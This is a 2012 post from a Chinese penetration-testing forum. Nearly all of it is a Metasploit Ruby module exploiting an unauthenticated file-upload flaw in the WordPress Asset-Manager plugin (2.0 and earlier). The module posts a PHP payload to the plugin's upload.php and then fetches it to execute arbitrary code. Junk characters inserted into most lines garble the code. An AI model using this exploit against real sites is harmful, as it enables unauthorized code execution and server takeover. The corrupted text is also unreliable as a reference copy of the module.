中国网络渗透测试联盟

标题: WordPress Asset-Manager PHP文件上传漏洞 [打印本页]
作者: admin    时间: 2012-12-31 09:22
标题: WordPress Asset-Manager PHP文件上传漏洞
这个模块利用Metasploi脆弱漏洞库在WordPress版本Asset-Manager插件2.0以及以下版本发现的。允许上传php文件、一用户可以上传一个文件到一个临时目录没有身份验证,从而导致执行任意代码。$ E& V$ M8 o: Q$ B- B+ }, F$ _) V0 e+ ~

9 t9 W" p( b9 [: j5 @: L5 c, _6 O* ]##
3 s1 |( t# F# |2 F, V% D, T3 r$ S# This file is part of the Metasploit Framework and may be subject to* m' O0 Z' \  H6 ?
# redistribution and commercial restrictions. Please see the Metasploit  f* H8 }1 x8 O  o  m& y
# Framework web site for more information on licensing and terms of use.( ~' m1 ^$ M4 D" o
#   http://metasploit.com/framework/" d) G3 s% l! f/ M
##
# T2 T# K; V1 X7 u! ]
& q2 o% A. v3 H6 B: X8 e" ^! Y6 crequire 'msf/core'/ R3 {7 A! I% ?4 I# C4 t
require 'msf/core/exploit/php_exe'
5 Z* J7 \$ T/ l8 V, q% ~ 0 Z( s% }+ g/ x0 I# W. o: y  T+ |2 n
class Metasploit3 < Msf::Exploit::Remote& F8 \' h# W, n5 w. d
  Rank = ExcellentRanking  q0 s* T- f: m2 z3 |: R% k
# j5 E5 f* N7 g" B
  include Msf::Exploit::Remote::HttpClient
0 _4 y3 h) \2 P( v  j  include Msf::Exploit:hpEXE
6 o. U6 Y+ e- n* A; M7 R  } 6 G- l+ j& Z7 f$ n$ ?9 y
  def initialize(info = {})0 R: `/ C6 m& T9 V2 S
    super(update_info(info,+ K& D' b# }9 T8 b+ t7 _+ `2 g4 a" Y
      'Name'           => 'WordPress Asset-Manager PHP File Upload Vulnerability',
! D* \0 K: \% o2 q( t: N      'Description'    => %q{3 J% ~& h. `4 v' A, R+ y, c' ^
        This module exploits a vulnerability found in Asset-Manager <= 2.0  WordPress  p% K& v/ f7 U: k% ]1 V
        plugin.  By abusing the upload.php file, a malicious user can upload a file to a( K% ]8 m  `0 {/ w
        temp directory without authentication, which results in arbitrary code execution.7 H" F* r# s' z# T/ k8 T/ }* Y
      },: Q+ f% @& a" \1 ~
      'Author'         =>8 ?1 ]' B: r* E, x  s5 o  T# f: ]$ b
        [/ B" _$ v$ j: R4 d
          'Sammy FORGIT', # initial discovery: B! V7 ?( s1 [2 U* Y5 a5 S
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
  |$ |4 Y. D/ }: M        ],
3 h+ M* m6 E/ k- U      'License'        => MSF_LICENSE,' s' e( Z( G- u: U  z- Z9 H! v
      'References'     =>( ]/ u# }4 V1 z* r. }+ M
        [* l2 V- A! M, \
          [ 'OSVDB', '82653' ],* w# q! y+ k) f8 O1 B; o
          [ 'BID', '53809' ],
7 y& _1 S: z$ Y$ N/ M; I          [ 'EDB', '18993' ],2 f$ x/ p$ I* ]  G% S
          [ 'URL', 'http:// www.myhack58.com /' ]
; X5 Z+ d' k% x6 l        ],. n, Q* o* Q) D  p* }. g' ~. F+ @6 n
      'Payload'       =>
/ S2 a1 n/ y: X: y. M        {
$ t( ^( {0 J2 M; o8 b) j% c          'BadChars' => "\x00",
7 h' @+ S; ]$ G- e        },' I; m# W; ~4 V! f* Y
      'Platform'       => 'php',+ X5 z1 Q- V& Y+ _! M& e* |
      'Arch'           => ARCH_PHP,
8 O* [/ t7 F, ?4 m5 f2 f, }      'Targets'        =>* X) C0 F& t; @' q
        [7 z0 f6 n4 P9 I- \: v
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],* Y; r: H* W( z: U& w" [$ D0 c4 }
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]$ ]! ^! v8 B+ P( o$ a& ]$ H
        ],
3 \0 L$ \$ z: |, a/ \0 }      'DefaultTarget' => 0,5 e& B. E# Y! J! S. Y
      'DisclosureDate' => 'May 26 2012'))
2 P: J: P5 d  H: \' _: J 7 K# M& E! L; s, w4 [" a. ]4 F+ @
    register_options(% X) d% p( Y+ z. ^# e
      [( }; C6 x1 \+ l; M! m) R/ H
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])3 V# S* ~& V" j/ q! M8 I! O
      ], self.class)7 q+ c9 v% H7 n1 n0 G( z( Z
  end
# ]4 E) d; U6 m
8 h; F4 O& m5 n$ B$ {. E( U7 h  def exploit
; [+ O1 v' T; |, U    uri =  target_uri.path
4 H# m: e' n7 r1 v* i4 x& |    uri << '/' if uri[-1,1] != '/'! |3 p  x/ a. |* M/ D8 D8 W
    peer = "#{rhost}:#{rport}"
, U# P" @- l  m5 z    payload_name = "#{rand_text_alpha(5)}.php") B7 n4 n" N% d0 y* d0 u. T) \
    php_payload = get_write_exec_payload(:unlink_self=>true)
& @# p+ N5 R( e0 k4 f; x, p   X* s; V6 X* P0 m" {1 Y+ C) J
    data = Rex::MIME::Message.new" y& z! t7 b+ O* ^+ ~, Q9 {
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")
% T& y2 G7 \" @/ [) e# |: h    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')1 b: `. C) ~! ^7 h2 R

4 z6 w; K/ M5 ^7 B5 s( I    print_status("#{peer} - Uploading payload #{payload_name}")
7 C: T& X* S6 z    res = send_request_cgi({2 ]9 v( B& ^$ ^
      'method'  => 'POST',
2 q; @$ r2 y& l9 y: Q      'uri'     => "#{uri}wp-content/plugins/asset-manager/upload.php",
/ u& z6 v% m' n6 v' {; T3 ^      'ctype'   => "multipart/form-data; boundary=#{data.bound}",# V8 K% Z% _+ v  ]. |& D7 x
      'data'    => post_data
  }! H5 F5 [; ]8 }    })  ]) v  ~  r& L) L
% i* @1 a0 h  }  e- d% \0 m  \
    if not res or res.code != 200 or res.body !~ /#{payload_name}// e7 G9 N; P" J
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
5 D* Q; D) \$ iend. E: S3 j7 T5 G+ I. C

' ?  E; i) p' s) o3 f5 {; r# d    print_status("#{peer} - Executing payload #{payload_name}")
7 f3 h) q+ b9 W6 U( ~' n    res = send_request_raw({. G1 N+ ]. s7 |! X
      'uri'     => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",* g. b1 D: a$ f3 O! o
      'method'  => 'GET'1 l0 {$ v+ _" h4 u& Q/ p0 {! e* T4 {: k
    })
3 w3 Z' d. d# A1 W! W; l! E5 P ) }5 L9 L% Y. c9 k2 I: G/ Y& j
    if res and res.code != 2006 Y- E3 u  K9 F: t8 J5 [: d0 K
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")
) O6 q, f4 J# t) @    end
. U8 ~+ n. e; l2 e( J2 k( H  Q  end
) ^, M  f! y4 q3 A3 e# D6 Qend
5 l5 l0 M3 }( ~, |; {" ^3 ]



欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2